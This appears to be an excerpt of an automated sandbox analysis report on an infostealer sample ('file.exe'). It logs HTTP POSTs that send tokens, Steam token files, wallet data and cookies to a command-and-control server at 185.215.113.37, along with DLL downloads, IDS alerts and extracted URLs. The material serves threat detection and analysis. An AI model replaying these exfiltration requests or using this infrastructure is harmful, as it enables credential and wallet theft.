name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZ
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 2d 2d 0d 0a Data Ascii: ------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="file"------AFCBFIJEHDHCBGDGDGCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="file"------HIIIJDAAAAAAKECBFBAE--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAKHost: 185.215.113.37Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="message"wallets------AKEGDHJDHDAFHJJKJEHC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="message"ybncbhylepme------KJJECGHJDBFIJJJKEHCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 2d 2d 0d 0a Data Ascii: ------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file"------IJDBGDGCGDAKFIDGIDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGCHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 2d 2d 0d 0a Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="message"files------AKKKFBGDHJKFHJJJJDGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 2d 2d 0d 0a Data Ascii: ------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EBAKFIIJJKJJJJJJEGDA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49705 -> 185.215.113.37:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007660A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_007660A0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll8
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllJ
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllg
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlly
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll0
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllV
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll5.113.37
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllA
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/b
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dllA
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php:
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpGDHJDHDAFHJJKJEHC
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdowsApps
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpll
Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1638110314.0000000001278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37d
Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phpefox
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
